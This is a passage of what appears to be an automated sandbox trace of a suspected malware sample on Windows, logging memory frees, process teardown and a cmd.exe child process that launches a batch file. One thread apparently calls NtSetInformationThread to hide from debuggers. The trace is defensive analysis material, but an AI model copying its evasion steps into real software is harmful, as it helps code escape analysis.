dwFlags=0x0, lpMem=0x2c767b8 | out: hHeap=0x2c70000) returned 1 [0166.104] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74748 | out: hHeap=0x2c70000) returned 1 [0166.104] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c76418 | out: hHeap=0x2c70000) returned 1 [0166.104] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81700 | out: hHeap=0x2c70000) returned 1 [0166.104] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c817f8 | out: hHeap=0x2c70000) returned 1 [0166.104] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c816c0 | out: hHeap=0x2c70000) returned 1 [0166.104] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81848 | out: hHeap=0x2c70000) returned 1 [0166.104] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c816a8 | out: hHeap=0x2c70000) returned 1 [0166.104] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81588 | out: hHeap=0x2c70000) returned 1 [0166.105] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c823b8 | out: hHeap=0x2c70000) returned 1 [0166.105] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82470 | out: hHeap=0x2c70000) returned 1 [0166.105] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82388 | out: hHeap=0x2c70000) returned 1 [0166.105] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c824b0 | out: hHeap=0x2c70000) returned 1 [0166.105] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81ba0 | out: hHeap=0x2c70000) returned 1 [0166.105] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81a68 | out: hHeap=0x2c70000) returned 1 [0166.105] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82f90 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83088 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82f60 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c830d8 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81bb8 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82e40 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83548 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75ce8 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75cb8 | out: hHeap=0x2c70000) returned 1 [0166.106] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83628 | out: hHeap=0x2c70000) returned 1 [0166.107] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81bd0 | out: hHeap=0x2c70000) returned 1 [0166.107] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83428 | out: hHeap=0x2c70000) returned 1 [0166.107] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c857f8 | out: hHeap=0x2c70000) returned 1 [0166.107] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75d40 | out: hHeap=0x2c70000) returned 1 [0166.107] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c85908 | out: hHeap=0x2c70000) returned 1 [0166.107] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81be8 | out: hHeap=0x2c70000) returned 1 [0166.108] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83810 | out: hHeap=0x2c70000) returned 1 [0166.108] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c85b40 | out: hHeap=0x2c70000) returned 1 [0166.108] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c85c50 | out: hHeap=0x2c70000) returned 1 [0166.108] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c85cb0 | out: hHeap=0x2c70000) returned 1 [0166.108] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81c00 | out: hHeap=0x2c70000) returned 1 [0166.108] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83938 | out: hHeap=0x2c70000) returned 1 [0166.108] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c85f18 | out: hHeap=0x2c70000) returned 1 [0166.109] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c85fb0 | out: hHeap=0x2c70000) returned 1 [0166.109] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c85ee8 | out: hHeap=0x2c70000) returned 1 [0166.109] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c85fe8 | out: hHeap=0x2c70000) returned 1 [0166.155] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81c18 | out: hHeap=0x2c70000) returned 1 [0166.155] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83a60 | out: hHeap=0x2c70000) returned 1 [0166.155] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86168 | out: hHeap=0x2c70000) returned 1 [0166.155] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86200 | out: hHeap=0x2c70000) returned 1 [0166.155] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86138 | out: hHeap=0x2c70000) returned 1 [0166.155] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86230 | out: hHeap=0x2c70000) returned 1 [0166.170] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81c30 | out: hHeap=0x2c70000) returned 1 [0166.170] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83b88 | out: hHeap=0x2c70000) returned 1 [0166.170] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83308 | out: hHeap=0x2c70000) returned 1 [0166.170] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c833d0 | out: hHeap=0x2c70000) returned 1 [0166.170] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c832d8 | out: hHeap=0x2c70000) returned 1 [0166.171] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86520 | out: hHeap=0x2c70000) returned 1 [0166.171] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81c48 | out: hHeap=0x2c70000) returned 1 [0166.171] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83cb0 | out: hHeap=0x2c70000) returned 1 [0166.185] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c866f8 | out: hHeap=0x2c70000) returned 1 [0166.185] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c867c8 | out: hHeap=0x2c70000) returned 1 [0166.185] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c866c8 | out: hHeap=0x2c70000) returned 1 [0166.185] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86820 | out: hHeap=0x2c70000) returned 1 [0166.185] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81c60 | out: hHeap=0x2c70000) returned 1 [0166.186] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83dd8 | out: hHeap=0x2c70000) returned 1 [0166.186] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86a08 | out: hHeap=0x2c70000) returned 1 [0166.186] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86b00 | out: hHeap=0x2c70000) returned 1 [0166.186] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c869d8 | out: hHeap=0x2c70000) returned 1 [0166.186] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86b60 | out: hHeap=0x2c70000) returned 1 [0166.186] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81c78 | out: hHeap=0x2c70000) returned 1 [0166.186] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83f00 | out: hHeap=0x2c70000) returned 1 [0166.186] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86d60 | out: hHeap=0x2c70000) returned 1 [0166.187] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75d98 | out: hHeap=0x2c70000) returned 1 [0166.187] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86da0 | out: hHeap=0x2c70000) returned 1 [0166.187] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c83418 | out: hHeap=0x2c70000) returned 1 [0166.191] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c84028 | out: hHeap=0x2c70000) returned 1 [0166.191] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86e88 | out: hHeap=0x2c70000) returned 1 [0166.191] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86e60 | out: hHeap=0x2c70000) returned 1 [0166.191] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86ef8 | out: hHeap=0x2c70000) returned 1 [0166.192] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81c90 | out: hHeap=0x2c70000) returned 1 [0166.192] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c84150 | out: hHeap=0x2c70000) returned 1 [0166.192] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c86380 | out: hHeap=0x2c70000) returned 1 [0166.192] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c827d8 | out: hHeap=0x2c70000) returned 1 [0166.192] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c863d8 | out: hHeap=0x2c70000) returned 1 [0166.192] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75da8 | out: hHeap=0x2c70000) returned 1 [0166.192] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c84278 | out: hHeap=0x2c70000) returned 1 [0166.193] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c871f0 | out: hHeap=0x2c70000) returned 1 [0166.193] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c864e0 | out: hHeap=0x2c70000) returned 1 [0166.193] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c864b0 | out: hHeap=0x2c70000) returned 1 [0166.193] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87290 | out: hHeap=0x2c70000) returned 1 [0166.193] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81ca8 | out: hHeap=0x2c70000) returned 1 [0166.193] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c843a0 | out: hHeap=0x2c70000) returned 1 [0166.193] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87400 | out: hHeap=0x2c70000) returned 1 [0166.194] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c874e0 | out: hHeap=0x2c70000) returned 1 [0166.194] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87528 | out: hHeap=0x2c70000) returned 1 [0166.194] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c873f0 | out: hHeap=0x2c70000) returned 1 [0166.194] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c844c8 | out: hHeap=0x2c70000) returned 1 [0166.194] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87718 | out: hHeap=0x2c70000) returned 1 [0166.194] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c878a0 | out: hHeap=0x2c70000) returned 1 [0166.194] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c878e8 | out: hHeap=0x2c70000) returned 1 [0166.194] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87708 | out: hHeap=0x2c70000) returned 1 [0166.195] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c845f0 | out: hHeap=0x2c70000) returned 1 [0166.195] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81398 | out: hHeap=0x2c70000) returned 1 [0166.195] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72288 | out: hHeap=0x2c70000) returned 1 [0166.195] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b38 | out: hHeap=0x2c70000) returned 1 [0166.195] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82878 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c722c0 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82738 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c746f0 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82778 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c826f8 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74088 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82718 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c826d8 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82658 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82678 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74760 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73be8 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82838 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c751e8 | out: hHeap=0x2c70000) returned 1 [0166.196] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74728 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82798 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75508 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82818 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73178 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82698 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81a48 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c826b8 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82758 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82858 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c731a8 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74b78 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73e48 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73758 | out: hHeap=0x2c70000) returned 1 [0166.197] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c749a0 | out: hHeap=0x2c70000) returned 1 [0166.198] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c827b8 | out: hHeap=0x2c70000) returned 1 [0166.198] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72700 | out: hHeap=0x2c70000) returned 1 [0166.198] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c870f8 | out: hHeap=0x2c70000) returned 1 [0166.198] HeapFree (in: hHeap=0x3fc0000, dwFlags=0x0, lpMem=0x3fc07d0 | out: hHeap=0x3fc0000) returned 1 [0166.198] GetCursorPos (in: lpPoint=0x28fd84 | out: lpPoint=0x28fd84*(x=387, y=619)) returned 1 [0166.198] GetCapture () returned 0x0 [0166.198] WindowFromPoint (Point=0x183) returned 0x2035c [0166.198] GetWindowThreadProcessId (in: hWnd=0x2035c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf90 [0166.199] DestroyWindow (hWnd=0x103e4) returned 0 [0166.199] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c721e8 | out: hHeap=0x2c70000) returned 1 [0166.199] DeleteDC (hdc=0x12010c4c) returned 1 [0166.200] IMalloc:Free (This=0x76da66bc, pv=0x108eb70) [0166.200] IMalloc:Free (This=0x76da66bc, pv=0x1099108) [0166.200] IMalloc:Free (This=0x76da66bc, pv=0x1086f00) [0166.200] IMalloc:Free (This=0x76da66bc, pv=0x1098c68) [0166.200] IMalloc:Free (This=0x76da66bc, pv=0x1099130) [0166.200] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x28fdc4 | out: lplpMessageFilter=0x28fdc4*=0x2c72054) returned 0x0 [0166.201] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72050 | out: hHeap=0x2c70000) returned 1 [0166.201] UnhookWindowsHookEx (hhk=0x2014f) returned 1 [0166.201] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c721d0 | out: hHeap=0x2c70000) returned 1 [0166.201] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c721b0 | out: hHeap=0x2c70000) returned 1 [0166.201] GetTickCount () returned 0x1d15328 [0166.201] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72120 | out: hHeap=0x2c70000) returned 1 [0166.201] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72170 | out: hHeap=0x2c70000) returned 1 [0166.201] SetWindowLongA (hWnd=0x103e2, nIndex=0, dwNewLong=0) returned 46604444 [0166.201] DestroyWindow (hWnd=0x103e2) returned 1 [0166.201] NtdllDefWindowProc_A (hWnd=0x103e2, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0166.208] NtdllDefWindowProc_A (hWnd=0x103e2, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0166.211] NtdllDefWindowProc_A (hWnd=0x103e2, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0166.211] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72098 | out: hHeap=0x2c70000) returned 1 [0166.212] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72078 | out: hHeap=0x2c70000) returned 1 [0166.212] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72138 | out: hHeap=0x2c70000) returned 1 [0166.212] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82898 | out: hHeap=0x2c70000) returned 1 [0166.212] HeapDestroy (hHeap=0x3fc0000) returned 1 [0166.213] GlobalDeleteAtom (nAtom=0xc164) returned 0x0 [0166.213] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c717e0 | out: hHeap=0x2c70000) returned 1 [0166.213] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c717b0 | out: hHeap=0x2c70000) returned 1 [0166.213] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87000 | out: hHeap=0x2c70000) returned 1 [0166.214] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72b40 | out: hHeap=0x2c70000) returned 1 [0166.214] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c71810 | out: hHeap=0x2c70000) returned 1 [0166.214] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c71bc0 | out: hHeap=0x2c70000) returned 1 [0166.214] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c71f70 | out: hHeap=0x2c70000) returned 1 [0166.214] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c88450 | out: hHeap=0x2c70000) returned 1 [0166.214] VirtualFree (lpAddress=0x3e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.215] IMalloc:Free (This=0x76da66bc, pv=0x108b370) [0166.215] IMalloc:Free (This=0x76da66bc, pv=0x10a65e0) [0166.215] IUnknown:AddRef (This=0x76da66bc) returned 0x1 [0166.215] Sleep (dwMilliseconds=0x0) [0166.295] CoFreeUnusedLibraries () [0166.295] OleUninitialize () [0166.302] FreeLibrary (hLibModule=0x775d0000) returned 1 [0166.302] ReleaseSemaphore (in: hSemaphore=0x11c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0166.302] GetCurrentThreadId () returned 0xba4 [0166.302] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c708e0 | out: hHeap=0x2c70000) returned 1 [0166.303] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c707d0 | out: hHeap=0x2c70000) returned 1 [0166.303] ExitProcess (uExitCode=0x0) [0166.306] SysReAllocStringLen (in: pbstr=0x28fbe8*=0x0, psz="KERNELBASE.DLL", len=0xe | out: pbstr=0x28fbe8*="KERNELBASE.DLL") returned 1 [0166.306] CharLowerBuffW (in: lpsz="KERNELBASE.DLL", cchLength=0xe | out: lpsz="kernelbase.dll") returned 0xe [0166.307] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x77240000 [0166.307] GetProcAddress (hModule=0x77240000, lpProcName="DecodePointer") returned 0x77a99d35 [0166.308] SysReAllocStringLen (in: pbstr=0x28fbe4*=0x0, psz="KERNELBASE.DLL", len=0xe | out: pbstr=0x28fbe4*="KERNELBASE.DLL") returned 1 [0166.308] CharLowerBuffW (in: lpsz="KERNELBASE.DLL", cchLength=0xe | out: lpsz="kernelbase.dll") returned 0xe [0166.308] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x77240000 [0166.309] GetProcAddress (hModule=0x77240000, lpProcName="DecodePointer") returned 0x77a99d35 [0166.310] GetCurrentThreadId () returned 0xba4 [0166.310] GetCurrentThreadId () returned 0xba4 [0166.310] IUnknown:AddRef (This=0x76da66bc) returned 0x1 [0166.311] HeapDestroy (hHeap=0x2c70000) returned 1 [0166.316] CloseHandle (hObject=0x98) returned 1 [0166.316] CloseHandle (hObject=0x9c) returned 1 [0166.319] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb0da8 | out: hHeap=0x2cb0000) returned 1 [0166.320] VirtualFree (lpAddress=0x2cc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0166.321] HeapDestroy (hHeap=0x2cb0000) returned 1 [0166.324] FreeLibrary (hLibModule=0x76920000) returned 1 Thread: id = 70 os_tid = 0xb50 [0164.602] GetCurrentThreadId () returned 0xb50 [0164.602] GetTickCount () returned 0x1d0fed1 [0164.602] Sleep (dwMilliseconds=0x3e8) [0165.702] Sleep (dwMilliseconds=0x3e8) Thread: id = 71 os_tid = 0xb84 [0164.959] GetCurrentThreadId () returned 0xb84 [0164.960] GetLocalTime (in: lpSystemTime=0x3deff0c | out: lpSystemTime=0x3deff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x321)) [0164.960] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0164.960] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0164.961] GetCurrentThread () returned 0xfffffffe [0164.961] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0164.961] GetTickCount () returned 0x1d10038 [0164.961] Sleep (dwMilliseconds=0x3e8) [0166.019] GetLocalTime (in: lpSystemTime=0x3deff0c | out: lpSystemTime=0x3deff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1, wMilliseconds=0x35e)) [0166.020] GetTickCount () returned 0x1d1045c [0166.020] Sleep (dwMilliseconds=0x3e8) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2a836000" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xfd4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c c:\\windows\\W_X_C.bat" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1675 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1676 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1677 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1678 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1679 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1680 start_va = 0x1f0000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1681 start_va = 0x240000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1682 start_va = 0x4a3a0000 end_va = 0x4a3ebfff monitored = 1 entry_point = 0x4a3a829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1683 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1684 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") 